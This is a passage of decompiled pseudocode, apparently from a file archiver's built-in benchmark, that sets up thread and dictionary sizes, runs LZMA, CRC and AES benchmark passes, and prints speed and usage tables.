				void* _t1116;
				signed int _t1119;
				signed int _t1120;
				void* _t1123;
				signed int _t1124;
				signed char _t1125;
				signed int _t1130;
				void* _t1132;
				signed int _t1134;
				void* _t1135;
				void* _t1144;
				signed int _t1146;
				char* _t1148;
				signed int _t1149;
				char* _t1154;
				void* _t1158;
				signed int _t1159;
				void* _t1174;
				unsigned int _t1183;
				signed int _t1190;
				signed int _t1197;
				signed int _t1204;
				void* _t1207;
				void* _t1213;
				signed int _t1218;
				signed int _t1219;
				void* _t1220;
				signed int _t1226;
				signed int _t1247;
				signed int _t1252;
				signed int _t1253;
				void* _t1255;
				char* _t1260;
				void* _t1262;
				signed int _t1264;
				void* _t1265;
				char* _t1270;
				signed int _t1272;
				signed int _t1273;
				signed int _t1274;
				void* _t1276;
				signed int _t1282;
				signed int _t1301;
				signed int _t1302;
				signed int _t1304;
				void* _t1312;
				void* _t1332;
				void* _t1333;
				void* _t1334;
				void* _t1335;
				void* _t1336;
				signed int _t1337;
				signed int _t1343;
				signed int _t1344;
				void* _t1358;
				signed int _t1359;
				void* _t1362;
				void* _t1367;
				void* _t1369;
				signed int _t1371;
				void* _t1372;
				void* _t1376;
				signed int _t1378;
				signed int _t1380;
				intOrPtr _t1384;
				signed int _t1394;
				signed int _t1396;
				signed int _t1400;
				void* _t1426;
				signed int _t1427;
				void* _t1433;
				void* _t1434;
				void* _t1436;
				unsigned int _t1437;
				signed int _t1447;
				signed char _t1454;
				void* _t1462;
				unsigned int _t1469;
				signed int _t1470;
				signed int _t1476;
				void* _t1484;
				void* _t1489;
				signed int _t1491;
				char* _t1501;
				void* _t1502;
				void* _t1503;
				intOrPtr _t1509;
				void* _t1511;
				void* _t1516;
				void* _t1526;
				signed int _t1528;
				void* _t1534;
				signed int _t1542;
				signed int _t1543;
				signed int _t1544;
				signed int _t1545;
				signed int _t1546;
				void* _t1547;
				void* _t1550;
				signed int _t1553;
				signed int _t1554;
				signed int _t1555;
				signed int _t1556;
				signed int _t1559;
				void* _t1569;
				signed int _t1572;
				void* _t1578;
				signed int _t1581;
				void* _t1584;
				void* _t1587;
				void* _t1590;
				void* _t1592;
				void* _t1595;
				signed int _t1601;
				signed int _t1604;
				signed int _t1608;
				signed int _t1614;
				signed int _t1615;
				intOrPtr* _t1622;
				void* _t1624;
				signed int _t1626;
				intOrPtr* _t1629;
				void* _t1631;
				signed int _t1633;
				signed int _t1635;
				signed int _t1658;
				signed int _t1662;
				char* _t1680;
				signed int _t1717;
				signed int _t1762;
				signed int _t1768;
				void* _t1804;
				signed int _t1829;
				signed int _t1838;
				signed int _t1844;
				signed int _t1861;
				signed int _t1873;
				void* _t1876;
				void* _t1883;
				void* _t1888;
				char* _t1973;
				char* _t1983;
				signed int _t1984;
				char* _t1988;
				void* _t1994;
				char* _t1995;
				char* _t1996;
				char* _t2006;
				signed int _t2023;
				void* _t2059;
				signed int _t2073;
				signed int _t2075;
				intOrPtr* _t2076;
				signed int _t2078;
				signed int _t2080;
				char* _t2081;
				intOrPtr _t2084;
				unsigned int _t2085;
				signed int _t2086;
				signed int _t2087;
				signed int _t2088;
				void* _t2089;
				void* _t2093;
				intOrPtr _t2094;
				signed int _t2095;
				void* _t2096;
				void* _t2097;
				signed int _t2098;
				signed int _t2100;
				signed int _t2101;
				signed int _t2104;
				void* _t2105;
				signed int _t2107;
				signed int _t2108;
				signed int _t2109;
				signed int _t2110;
				signed int _t2111;
				intOrPtr _t2112;
				void* _t2113;
				signed int _t2114;
				unsigned int _t2116;
				unsigned int _t2117;
				intOrPtr* _t2119;
				signed int _t2120;
				char* _t2121;
				void* _t2124;
				signed int _t2125;
				signed int _t2126;
				signed int _t2127;
				unsigned int _t2128;
				signed int _t2132;
				signed int _t2133;
				intOrPtr _t2135;
				signed int _t2137;
				intOrPtr _t2138;
				void* _t2139;
				void* _t2141;
				char** _t2142;
				void* _t2149;

				_t2149 = __fp0;
				_t1973 = __edx;
				E0041F1B0(E004242E4, _t2139);
				_t2142 = _t2141 - 0x398;
				 *(_t2139 - 0x1c) = __edx;
				_t1635 = __ecx;
				if(L003CD9F2(__edx) != 0) {
					_t2073 = 0;
					_t2100 = 1;
					 *((intOrPtr*)(_t2139 - 0x138)) = 0x80000000;
					 *((intOrPtr*)(_t2139 - 0x134)) = 0;
					 *(_t2139 - 0x144) = _t2100;
					 *(_t2139 - 0x140) = _t2100;
					_t1109 = E003B97C7(_t2139 - 0x144);
					__eflags = _t1109;
					if(_t1109 == 0) {
						L5:
						_t1110 = L003B97DA();
						L6:
						 *(_t2139 - 0x34) = _t1110;
						_t1111 = E003B9809(_t2139 - 0x138);
						 *(_t2139 - 0xd) =  *(_t2139 - 0xd) & 0x00000000;
						 *(_t2139 - 0x6e) =  *(_t2139 - 0x6e) & 0x00000000;
						 *(_t2139 - 0x6d) =  *(_t2139 - 0x6d) & 0x00000000;
						 *((char*)(_t2139 - 0xc4)) = _t1111;
						_t1640 = _t2139 - 0xf0;
						 *(_t2139 - 0x4c) =  *(_t2139 - 0x34);
						 *(_t2139 - 0xc8) = 0xfa0;
						 *(_t2139 - 0x94) = 0x16;
						 *(_t2139 - 0x78) = _t2073;
						 *(_t2139 - 0x74) = _t2073;
						 *(_t2139 - 0x80) = _t2073;
						 *(_t2139 - 0x7c) = 4;
						 *(_t2139 - 0x148) = _t2100;
						 *(_t2139 - 0x1a0) = _t2073;
						 *(_t2139 - 0x19c) = _t2073;
						 *(_t2139 - 0x198) = _t2100;
						E003CCBDD(_t2139 - 0xf0);
						 *(_t2139 - 4) = _t2073;
						 *(_t2139 - 0x30) = _t2073;
						 *(_t2139 - 0x2c) = _t2073;
						 *(_t2139 - 0xe) =  *(_t2139 - 0xe) & 0x00000000;
						 *(_t2139 - 0xf) =  *(_t2139 - 0xf) & 0x00000000;
						__eflags = _t1635 - _t2073;
						 *(_t2139 - 4) = 1;
						if(_t1635 == _t2073) {
							L13:
							 *(_t2139 - 0x14) = _t2073;
							__eflags = 4[ *(_t2139 + 8)] - _t2073;
							if(__eflags <= 0) {
								L83:
								__eflags = _t1635 - _t2073;
								if(_t1635 == _t2073) {
									__eflags =  *(_t2139 + 0x14) - _t2073;
									if( *(_t2139 + 0x14) == _t2073) {
										L130:
										__eflags =  *(_t2139 - 0x4c) - 2;
										if( *(_t2139 - 0x4c) < 2) {
											L162:
											__eflags = _t1635;
											if(_t1635 != 0) {
												( *_t1635)[4]();
												( *_t1635)[4]();
												L003CDBE7(_t1635, _t1635, "size: ");
												 *(_t2139 - 4) = 0x10;
												_t1462 =  *( *_t1635)( *((intOrPtr*)(L003C9E24(_t2139 - 0x184, _t2139 - 0x144, _t2073, __eflags))),  *((intOrPtr*)(_t2139 - 0xc4)),  *((intOrPtr*)(_t2139 - 0x138)),  *((intOrPtr*)(_t2139 - 0x134)), "CPU hardware threads:",  *(_t2139 - 0x34));
												 *(_t2139 - 4) = 1;
												E003B1E40(_t1462,  *((intOrPtr*)(_t2139 - 0x184)));
												( *_t1635)[4]();
											}
											L164:
											_t1116 = 1;
											__eflags =  *(_t2139 - 0x4c) - _t1116;
											if( *(_t2139 - 0x4c) < _t1116) {
												L481:
												_t2101 = 0x80070057;
												L482:
												E0040B370( *(_t2139 - 0x30));
												L483:
												_t1102 = _t2139 - 4;
												 *_t1102 =  *(_t2139 - 4) | 0xffffffff;
												__eflags =  *_t1102;
												L003C9708(_t2139 - 0xf0);
												_t1119 = _t2101;
												goto L484;
											}
											__eflags =  *(_t2139 - 0x4c) - 0x1000;
											if( *(_t2139 - 0x4c) > 0x1000) {
												goto L481;
											}
											_t1120 = E0041F4F0(_t1116,  *(_t2139 - 0x94), 0);
											__eflags =  *(_t2139 - 0xf);
											 *(_t2139 - 0x68) = _t1120;
											 *(_t2139 - 0x64) = 0;
											if(__eflags != 0) {
												L169:
												 *(_t2139 + 0xb) = 1;
												L170:
												 *(_t2139 - 0x84) = E003BD3FA(_t2139 - 0xf0, __eflags);
												_t1123 = E003B26EC(_t2139 - 0x11c, __eflags, _t2139 - 0xe4);
												 *(_t2139 - 4) = 0x11;
												__eflags =  *(_t2139 - 0xe0);
												if( *(_t2139 - 0xe0) == 0) {
													_t1123 = E003B2711(_t2139 - 0xe4, "LZMA");
												}
												__eflags =  *(_t2139 - 0x1c);
												if(__eflags == 0) {
													_t1124 = E003B23C9( *((intOrPtr*)(_t2139 - 0xe4)), "CRC");
													__eflags = _t1124;
													if(_t1124 != 0) {
														E003B2711(_t2139 - 0xe4, "crc32");
													}
													_t1125 = E003BA5CE(_t2139 - 0x1a8);
													 *(_t2139 - 0x45) =  *(_t2139 - 0x45) & 0x00000000;
													_t2075 = _t2073 | 0xffffffff;
													__eflags = _t1125;
													 *(_t2139 + 0x17) = _t1125;
													if(_t1125 == 0) {
														_t1447 = E003BA508(_t2139 - 0x11c, 1, _t2139 - 0x1a8, _t2139 - 0x58, _t2139 - 0x45);
														__eflags =  *(_t2139 - 0x45);
														_t2075 = _t1447;
														if( *(_t2139 - 0x45) == 0) {
															_t2075 = _t2075 | 0xffffffff;
															__eflags = _t2075;
														}
													}
													L003CDCA0(_t2139 - 0x2cc);
													_t1127 = L003CDCE2(_t2139 - 0x2cc);
													__eflags =  *(_t2139 + 0x17);
													 *(_t2139 - 0x2a4) = _t1635;
													if( *(_t2139 + 0x17) != 0) {
														L343:
														__eflags = _t1635;
														if(_t1635 != 0) {
															__eflags =  *(_t2139 + 0xb);
															 *(_t2139 - 0xf8) =  *(_t2139 - 0x68);
															 *(_t2139 - 0xf4) =  *(_t2139 - 0x64);
															if( *(_t2139 + 0xb) == 0) {
																 *(_t2139 - 0xf8) = 0x8000000;
																 *(_t2139 - 0xf4) = 0;
															}
															__eflags =  *(_t2139 - 0xe);
															if( *(_t2139 - 0xe) != 0) {
																__eflags =  *(_t2139 + 0xb);
																_t1272 =  *(_t2139 - 0x2c);
																if( *(_t2139 + 0xb) != 0) {
																	__eflags =  *(_t2139 - 0xf4);
																	if(__eflags < 0) {
																		while(1) {
																			L354:
																			_t1130 = E003BD3D5(_t2139 - 0xf0, 1);
																			__eflags = _t1130;
																			if(_t1130 < 0) {
																				break;
																			}
																			E003CE997(_t2139 - 0xf0, _t1130);
																		}
																		 *(_t2139 - 0x13c) =  *(_t2139 - 0x13c) | 0xffffffff;
																		__eflags =  *(_t2139 + 0x17);
																		 *((intOrPtr*)(_t2139 - 0xc4)) = 0x1000;
																		 *(_t2139 - 0xcc) = 0;
																		if( *(_t2139 + 0x17) == 0) {
																			 *(_t2139 + 0x10) = 0;
																			_t2076 = 0x42a834;
																			do {
																				E003B26B2(_t2139 - 0x28,  *_t2076);
																				 *(_t2139 - 4) = 0x14;
																				_t1132 = E003B2690(_t2139 - 0xbc);
																				 *(_t2139 - 4) = 0x15;
																				_t2104 = E003B222D(_t1132,  *(_t2139 - 0x28), 0x3a);
																				__eflags = _t2104;
																				if(_t2104 >= 0) {
																					_t781 =  &(( *(_t2139 - 0x28))[1]); // 0x1
																					E003B2711(_t2139 - 0xbc,  &(_t781[_t2104]));
																					__eflags = _t2104 -  *(_t2139 - 0x24);
																					if(_t2104 <  *(_t2139 - 0x24)) {
																						_t1260 =  *(_t2139 - 0x28);
																						 *(_t2139 - 0x24) = _t2104;
																						_t785 =  &(_t1260[_t2104]);
																						 *_t785 = _t1260[_t2104] & 0x00000000;
																						__eflags =  *_t785;
																					}
																				}
																				_t1134 = L003CE7B9( *(_t2139 - 0x28),  *((intOrPtr*)(_t2139 - 0xe4)));
																				__eflags = _t1134;
																				if(_t1134 != 0) {
																					_t1134 = E003B2407( *((intOrPtr*)(_t2139 - 0xd8)),  *((intOrPtr*)(_t2139 - 0xbc)));
																					__eflags = _t1134;
																					 *(_t2139 - 0x13c) =  *(_t2139 + 0x10);
																					if(_t1134 != 0) {
																						_t1255 = E003B1E40(_t1134,  *((intOrPtr*)(_t2139 - 0xbc)));
																						_push( *(_t2139 - 0x28));
																						 *(_t2139 - 4) = 0x11;
																						L375:
																						E003B1E40(_t1255);
																						L376:
																						_t1658 =  *(_t2139 - 0xf8);
																						 *(_t2139 - 0x50) =  *(_t2139 - 0xf4);
																						asm("sbb eax, eax");
																						_t2105 = 0x100000;
																						 *(_t2139 - 0x54) = _t1658;
																						__eflags =  *(_t2139 - 0xe);
																						 *(_t2139 + 0x10) = ( ~( *(_t2139 + 0x17)) & 0x000000fe) + 3;
																						if( *(_t2139 - 0xe) == 0) {
																							L384:
																							_t1144 = E0041F4B0( *(_t2139 + 0x10) *  *(_t2139 - 0x4c),  *(_t2139 + 0x10) *  *(_t2139 - 0x4c) >> 0x20,  *(_t2139 - 0x54),  *(_t2139 - 0x50));
																							asm("adc edi, edx");
																							E003CE7BE( *(_t2139 - 0x4c), _t2105 + _t1144, 0);
																							_t1146 = 0;
																							 *((intOrPtr*)(_t2139 - 0x40)) = 0;
																							 *(_t2139 - 0x3c) = 0;
																							 *((intOrPtr*)(_t2139 - 0x38)) = 0;
																							_t2078 =  *(_t2139 - 0x148);
																							 *(_t2139 - 4) = 0x16;
																							__eflags = _t2078 -  *(_t2139 - 0x4c);
																							if(_t2078 >  *(_t2139 - 0x4c)) {
																								L393:
																								__eflags =  *(_t2139 + 0x17);
																								 *(_t2139 - 0x98) =  *(_t2139 - 0x98) & 0x00000000;
																								_t1662 = (0 |  *(_t2139 + 0x17) == 0x00000000) + 1;
																								 *(_t2139 - 0x14) = _t1662;
																								 *(_t2139 - 0x74) =  *(_t2139 - 0x74) & 0x00000000;
																								_t2107 = _t1146 * _t1662;
																								 *(_t2139 - 4) = 0x18;
																								_t2080 = _t2107 << 3;
																								_push(_t2080);
																								_t1148 = E003B1E0C();
																								_push(_t2080);
																								 *(_t2139 - 0x34) = _t1148;
																								 *(_t2139 - 0x98) = _t1148;
																								_t1149 = E003B1E0C();
																								 *(_t2139 + 0x10) = _t1149;
																								__eflags = _t2107;
																								 *(_t2139 - 0x74) = _t1149;
																								if(_t2107 <= 0) {
																									L396:
																									( *_t1635)[4]();
																									_t2081 = 0;
																									__eflags = 0;
																									 *(_t2139 + 8) = 0;
																									do {
																										( *_t1635)[4]();
																										__eflags =  *(_t2139 + 8) - _t2081;
																										if( *(_t2139 + 8) != _t2081) {
																											__eflags =  *(_t2139 + 8) - 1;
																											_t1154 = "    ";
																											if( *(_t2139 + 8) != 1) {
																												_t1154 = "Size";
																											}
																										} else {
																											_t1154 = "THRD";
																										}
																										 *( *_t1635)(_t1154);
																										_t2108 = 0;
																										__eflags =  *(_t2139 - 0x3c) - _t2081;
																										if( *(_t2139 - 0x3c) > _t2081) {
																											while(1) {
																												__eflags = _t2108 - _t2081;
																												if(_t2108 != _t2081) {
																													E003CE7DB(_t1635);
																												}
																												__eflags =  *(_t2139 + 8) - _t2081;
																												if(__eflags != 0) {
																													goto L408;
																												}
																												L407:
																												E003CA10C( *(_t2139 - 0x14) * 0xf - 0xf);
																												_t1994 = 0xe;
																												E003CA0A8(_t1635, _t1994, __eflags,  *((intOrPtr*)( *((intOrPtr*)(_t2139 - 0x40)) + _t2108 * 4)), _t2081);
																												L415:
																												_t2108 = _t2108 + 1;
																												__eflags = _t2108 -  *(_t2139 - 0x3c);
																												if(_t2108 <  *(_t2139 - 0x3c)) {
																													_t2081 = 0;
																													__eflags = 0;
																													__eflags = _t2108 - _t2081;
																													if(_t2108 != _t2081) {
																														E003CE7DB(_t1635);
																													}
																													__eflags =  *(_t2139 + 8) - _t2081;
																													if(__eflags != 0) {
																														goto L408;
																													}
																												}
																												_t2081 = 0;
																												__eflags = 0;
																												goto L417;
																												L408:
																												__eflags =  *(_t2139 - 0x14) - _t2081;
																												if( *(_t2139 - 0x14) <= _t2081) {
																													goto L415;
																												}
																												_t2087 =  *(_t2139 - 0x14);
																												do {
																													__eflags =  *(_t2139 + 8) - 1;
																													_t1995 = "Usage";
																													if( *(_t2139 + 8) != 1) {
																														_t1995 = "%";
																													}
																													L003CDD51(_t1635, _t1995, 6);
																													__eflags =  *(_t2139 + 8) - 1;
																													_t1996 = "BW";
																													if( *(_t2139 + 8) != 1) {
																														_t1996 = "MB/s";
																													}
																													L003CDD51(_t1635, _t1996, 9);
																													_t2087 = _t2087 - 1;
																													__eflags = _t2087;
																												} while (_t2087 != 0);
																												goto L415;
																											}
																										}
																										L417:
																										 *(_t2139 + 8) =  *(_t2139 + 8) + 1;
																										__eflags =  *(_t2139 + 8) - 3;
																									} while ( *(_t2139 + 8) < 3);
																									( *_t1635)[4]();
																									__eflags =  *(_t2139 - 0x6e);
																									 *(_t2139 - 0x8c) = _t2081;
																									 *(_t2139 - 0x88) = _t2081;
																									 *(_t2139 - 0x18) = 0xa;
																									if( *(_t2139 - 0x6e) != 0) {
																										 *(_t2139 - 0x18) =  *(_t2139 - 0x94);
																									}
																									while(1) {
																										_t1158 = 1;
																										_t1983 = 0;
																										_t1159 = E0041F4F0(_t1158,  *(_t2139 - 0x18), 0);
																										_t2109 =  *(_t2139 - 0x2c);
																										__eflags = 0;
																										 *(_t2139 - 0x6c) = _t2109;
																										if(0 > 0) {
																											goto L424;
																										}
																										if(0 < 0) {
																											L423:
																											__eflags =  *(_t2139 - 0xe);
																											if( *(_t2139 - 0xe) != 0) {
																												L425:
																												__eflags =  *(_t2139 + 0xc) - _t2081;
																												 *(_t2139 - 0x84) = _t2081;
																												if(__eflags <= 0) {
																													L459:
																													__eflags = 0 -  *(_t2139 - 0xf4);
																													if(__eflags > 0) {
																														L467:
																														_t1162 =  *(_t2139 - 0x8c) |  *(_t2139 - 0x88);
																														__eflags =  *(_t2139 - 0x8c) |  *(_t2139 - 0x88);
																														if(( *(_t2139 - 0x8c) |  *(_t2139 - 0x88)) == 0) {
																															L477:
																															_t2101 = 0;
																															__eflags = 0;
																															L478:
																															_t1127 = E003B1E40(E003B1E40(E003B1E40(_t1162,  *(_t2139 + 0x10)),  *(_t2139 - 0x34)),  *((intOrPtr*)(_t2139 - 0x40)));
																															goto L479;
																														}
																														 *( *_t1635)("Avg:");
																														 *(_t2139 + 8) =  *(_t2139 + 8) & 0x00000000;
																														__eflags =  *(_t2139 - 0x3c);
																														if( *(_t2139 - 0x3c) <= 0) {
																															L476:
																															_t1162 = ( *_t1635)[4]();
																															goto L477;
																														}
																														 *(_t2139 + 0x14) =  *(_t2139 + 0x10);
																														do {
																															__eflags =  *(_t2139 + 8);
																															if( *(_t2139 + 8) != 0) {
																																E003CE7DB(_t1635);
																															}
																															__eflags =  *(_t2139 - 0x14);
																															if( *(_t2139 - 0x14) > 0) {
																																_t2110 =  *(_t2139 + 0x14);
																																_t2083 =  *(_t2139 - 0x34) -  *(_t2139 + 0x10);
																																__eflags =  *(_t2139 - 0x34) -  *(_t2139 + 0x10);
																																 *(_t2139 + 0xc) =  *(_t2139 - 0x14);
																																do {
																																	_t1174 = E0041F380( *((intOrPtr*)(_t2110 + _t2083)), ( &(4[_t2083]))[_t2110],  *(_t2139 - 0x8c),  *(_t2139 - 0x88));
																																	_push(_t1983);
																																	_push(_t1174);
																																	E003CE822(_t1635, __eflags, E0041F380( *_t2110, 4[_t2110],  *(_t2139 - 0x8c),  *(_t2139 - 0x88)), _t1983);
																																	_t2110 = _t2110 + 8;
																																	_t1087 = _t2139 + 0xc;
																																	 *_t1087 =  *(_t2139 + 0xc) - 1;
																																	__eflags =  *_t1087;
																																} while ( *_t1087 != 0);
																															}
																															 *(_t2139 + 8) =  *(_t2139 + 8) + 1;
																															 *(_t2139 + 0x14) =  *(_t2139 + 0x14) + ( *(_t2139 - 0x14) << 3);
																															__eflags =  *(_t2139 + 8) -  *(_t2139 - 0x3c);
																														} while ( *(_t2139 + 8) <  *(_t2139 - 0x3c));
																														goto L476;
																													}
																													if(__eflags < 0) {
																														L462:
																														 *(_t2139 - 0x18) =  *(_t2139 - 0x18) + 1;
																														_t2081 = 0;
																														continue;
																													}
																													__eflags =  *(_t2139 - 0x6c) -  *(_t2139 - 0xf8);
																													if( *(_t2139 - 0x6c) >=  *(_t2139 - 0xf8)) {
																														goto L467;
																													}
																													goto L462;
																												} else {
																													goto L426;
																												}
																												do {
																													L426:
																													_t1983 =  *(_t2139 - 0x18);
																													E003CE7E5(_t1635, _t1983, __eflags);
																													 *(_t2139 + 8) =  *(_t2139 + 8) & 0x00000000;
																													__eflags =  *(_t2139 - 0x3c);
																													if( *(_t2139 - 0x3c) <= 0) {
																														goto L458;
																													}
																													_t1183 =  *(_t2139 - 0x34);
																													_t2111 =  *(_t2139 + 0x10);
																													 *(_t2139 - 0x1c) = _t1183;
																													 *(_t2139 - 0x44) = _t1183;
																													_t921 = _t2139 - 0x1c;
																													 *_t921 =  *(_t2139 - 0x1c) - _t2111;
																													__eflags =  *_t921;
																													 *(_t2139 - 0x110) = _t2111;
																													while(1) {
																														_t1162 = ( *_t1635)[8]();
																														_t1984 = 0;
																														__eflags = _t1162;
																														if(_t1162 != 0) {
																															break;
																														}
																														__eflags =  *(_t2139 + 0x17);
																														_t1680 =  *( *((intOrPtr*)(_t2139 - 0x40)) +  *(_t2139 + 8) * 4);
																														if( *(_t2139 + 0x17) == 0) {
																															_t2084 = 0x20;
																															_t2112 = _t2084;
																															__eflags = E003B22A4( *((intOrPtr*)(_t2139 - 0xe4)), "AES128");
																															if(__eflags == 0) {
																																__eflags = E003B22A4( *((intOrPtr*)(_t2139 - 0xe4)), "AES192");
																																if(__eflags == 0) {
																																	L442:
																																	_push(_t2139 - 0xf0);
																																	 *((intOrPtr*)(_t2139 - 0x290)) = _t2112;
																																	L003CD94B(_t2139 - 0x16c, __eflags);
																																	_t1190 =  *(_t2139 - 0x13c);
																																	 *(_t2139 - 4) = 0x19;
																																	__eflags = _t1190;
																																	if(_t1190 < 0) {
																																		__eflags =  *(_t2139 - 0x45);
																																		if( *(_t2139 - 0x45) == 0) {
																																			 *(_t2139 - 0x29c) = 0x400;
																																			 *(_t2139 - 0x294) = 0x40;
																																		} else {
																																			_t1218 = 4;
																																			 *(_t2139 - 0x29c) = _t1218;
																																			 *(_t2139 - 0x294) = _t1218;
																																		}
																																		_t980 = _t2139 - 0x298;
																																		 *_t980 =  *(_t2139 - 0x298) & 0x00000000;
																																		__eflags =  *_t980;
																																	} else {
																																		_t1219 = _t1190 + _t1190 * 2;
																																		_t1220 = 0x42a820 + _t1219 * 8;
																																		 *(_t2139 - 0x29c) =  *(0x42a828 + _t1219 * 8);
																																		 *(_t2139 - 0x294) =  *(_t1220 + 0x10);
																																		 *(_t2139 - 0x298) =  *(_t1220 + 0xc);
																																		_t2084 =  *((intOrPtr*)(_t1220 + 4));
																																	}
																																	 *(_t2139 - 0x2c8) =  *(_t2139 - 0x2c8) & 0x00000000;
																																	__eflags = E003B23C9( *(_t2139 - 0x160), "LZMA");
																																	if(__eflags == 0) {
																																		L451:
																																		_push(_t2139 - 0x2a0);
																																		_push(_t2139 - 0x2cc);
																																		_push(_t1635);
																																		_push(_t2084);
																																		_push( *(_t2139 - 0x30));
																																		_push( *(_t2139 - 0x6c));
																																		_push(_t2139 - 0x16c);
																																		_push(_t2139 - 0x1a0);
																																		_push( *(_t2139 - 0x7c));
																																		_t1988 =  *( *((intOrPtr*)(_t2139 - 0x40)) +  *(_t2139 + 8) * 4);
																																		_push( *(_t2139 - 0x80));
																																		_t1197 = E003CCC1E(0, _t1988, __eflags);
																																		_t2101 = _t1197;
																																		__eflags = _t2101;
																																		if(_t2101 != 0) {
																																			goto L466;
																																		}
																																		__eflags =  *(_t2139 + 8) - _t1197;
																																		if( *(_t2139 + 8) != _t1197) {
																																			E003CE7DB(_t1635);
																																		}
																																		_t2085 =  *(_t2139 - 0x44);
																																		_t1204 =  *(_t2139 + 0x10) -  *(_t2139 - 0x34);
																																		__eflags = _t1204;
																																		_t2113 = _t2139 - 0x23c;
																																		 *(_t2139 - 0x10c) = 2;
																																		 *(_t2139 - 0x58) = _t1204;
																																		do {
																																			 *(_t2139 - 0xb8) = L003C79ED(_t1635, _t2113, _t2085, _t2113, _t2149);
																																			 *(_t2139 - 0xb4) = _t1988;
																																			_t1207 = L003C7AE4(_t2113, E0041F4B0( *((intOrPtr*)(_t2113 + 0x30)),  *((intOrPtr*)(_t2113 + 0x34)),  *((intOrPtr*)(_t2113 + 0x20)),  *((intOrPtr*)(_t2113 + 0x24))), _t1988);
																																			 *(_t2139 - 0x20) = _t1988;
																																			 *((intOrPtr*)( *(_t2139 - 0x58) + _t2085)) =  *((intOrPtr*)( *(_t2139 - 0x58) + _t2085)) +  *(_t2139 - 0xb8);
																																			_t1988 =  *(_t2139 - 0xb4);
																																			asm("adc [ecx+0x4], edx");
																																			 *_t2085 =  *_t2085 + _t1207;
																																			_push( *(_t2139 - 0x20));
																																			_push(_t1207);
																																			asm("adc [edi+0x4], ecx");
																																			E003CE822(_t1635, __eflags,  *(_t2139 - 0xb8), _t1988);
																																			_t2085 = _t2085 + 8;
																																			_t2113 = _t2113 + 0x38;
																																			_t1029 = _t2139 - 0x10c;
																																			 *_t1029 =  *(_t2139 - 0x10c) - 1;
																																			__eflags =  *_t1029;
																																		} while ( *_t1029 != 0);
																																		 *(_t2139 - 4) = 0x18;
																																		L003C9708(_t2139 - 0x16c);
																																		_t2114 =  *(_t2139 - 0x110);
																																		L457:
																																		 *(_t2139 + 8) =  *(_t2139 + 8) + 1;
																																		 *(_t2139 - 0x44) =  *(_t2139 - 0x44) + 0x10;
																																		_t2114 = _t2114 + 8;
																																		__eflags =  *(_t2139 + 8) -  *(_t2139 - 0x3c);
																																		 *(_t2139 - 0x110) = _t2114;
																																		if( *(_t2139 + 8) <  *(_t2139 - 0x3c)) {
																																			continue;
																																		}
																																		goto L458;
																																	} else {
																																		 *(_t2139 - 0x12a) =  *(_t2139 - 0x12a) & 0x00000000;
																																		 *(_t2139 - 0x12c) = 0x13;
																																		 *(_t2139 - 0x124) =  *(_t2139 - 0x18);
																																		 *(_t2139 - 4) = 0x1a;
																																		_t1213 = E003B2DCD(_t2139 - 0x184, "d");
																																		 *(_t2139 - 4) = 0x1b;
																																		_push(_t2139 - 0x12c);
																																		_push(_t1213);
																																		_t2101 = L003BDE7C(_t2139 - 0x16c);
																																		E003B1E40(_t1214,  *((intOrPtr*)(_t2139 - 0x184)));
																																		__eflags = _t2101;
																																		if(_t2101 != 0) {
																																			E003B92C9(_t2139 - 0x12c);
																																			L466:
																																			 *(_t2139 - 4) = 0x18;
																																			E003B1E40(E003B1E40(E003B1E40(E003B1E40(L003C9708(_t2139 - 0x16c),  *(_t2139 + 0x10)),  *(_t2139 - 0x34)),  *((intOrPtr*)(_t2139 - 0x40))),  *((intOrPtr*)(_t2139 - 0x11c)));
																																			goto L482;
																																		}
																																		 *(_t2139 - 4) = 0x19;
																																		E003B92C9(_t2139 - 0x12c);
																																		goto L451;
																																	}
																																}
																																_push(0x18);
																																L441:
																																_pop(_t2112);
																																goto L442;
																															}
																															_push(0x10);
																															goto L441;
																														}
																														__eflags =  *(_t2139 - 0x18) - 0x11;
																														 *((intOrPtr*)(_t2139 - 0x104)) = 0;
																														 *(_t2139 - 0x100) = 0;
																														 *(_t2139 - 0x54) = 0;
																														 *(_t2139 - 0x50) = 0;
																														if( *(_t2139 - 0x18) == 0x11) {
																															__eflags =  *(_t2139 - 0xe);
																															if( *(_t2139 - 0xe) == 0) {
																																_t1984 =  *(_t2139 - 0xcc);
																															}
																														}
																														_push(0);
																														_push(0);
																														_push(0);
																														_push(0);
																														_push(0);
																														_push(_t2139 - 0x1a0);
																														_push(_t1635);
																														_push(_t2139 - 0xf0);
																														_push(_t1984);
																														_push(1);
																														_push( *((intOrPtr*)(_t2139 - 0xc4)));
																														_push(_t2139 - 0x54);
																														_push(_t2139 - 0x104);
																														_push( *(_t2139 - 0x30));
																														_push( *(_t2139 - 0x7c));
																														_push( *(_t2139 - 0x80));
																														_t1226 = L003CDFA7(_t1680,  *(_t2139 - 0x6c), _t2149);
																														_t2086 = _t1226;
																														__eflags = _t2086;
																														if(_t2086 != 0) {
																															E003B1E40(E003B1E40(E003B1E40(E003B1E40(_t1226,  *(_t2139 + 0x10)),  *(_t2139 - 0x34)),  *((intOrPtr*)(_t2139 - 0x40))),  *((intOrPtr*)(_t2139 - 0x11c)));
																															E0040B370( *(_t2139 - 0x30));
																															goto L342;
																														} else {
																															__eflags =  *(_t2139 + 8) - _t1226;
																															if(__eflags != 0) {
																																E003CE7DB(_t1635);
																															}
																															_push( *(_t2139 - 0x100));
																															_push( *((intOrPtr*)(_t2139 - 0x104)));
																															E003CE822(_t1635, __eflags,  *(_t2139 - 0x54),  *(_t2139 - 0x50));
																															_t1983 =  *(_t2139 - 0x100);
																															 *((intOrPtr*)( *(_t2139 - 0x1c) + _t2114)) =  *((intOrPtr*)( *(_t2139 - 0x1c) + _t2114)) +  *((intOrPtr*)(_t2139 - 0x104));
																															asm("adc [eax+0x4], edx");
																															 *_t2114 =  *_t2114 +  *(_t2139 - 0x54);
																															asm("adc [esi+0x4], ecx");
																															goto L457;
																														}
																													}
																													_t2101 = _t1162;
																													goto L478;
																													L458:
																													( *_t1635)[4]();
																													 *(_t2139 - 0x8c) =  *(_t2139 - 0x8c) + 1;
																													asm("adc dword [ebp-0x88], 0x0");
																													 *(_t2139 - 0x84) =  *(_t2139 - 0x84) + 1;
																													__eflags =  *(_t2139 - 0x84) -  *(_t2139 + 0xc);
																												} while (__eflags < 0);
																												goto L459;
																											}
																											goto L424;
																										}
																										__eflags = _t2109 - _t1159;
																										if(_t2109 > _t1159) {
																											goto L424;
																										}
																										goto L423;
																										L424:
																										 *(_t2139 - 0x6c) = _t1159;
																										goto L425;
																									}
																								}
																								_t1717 =  *(_t2139 - 0x34) - _t1149;
																								__eflags = _t1717;
																								do {
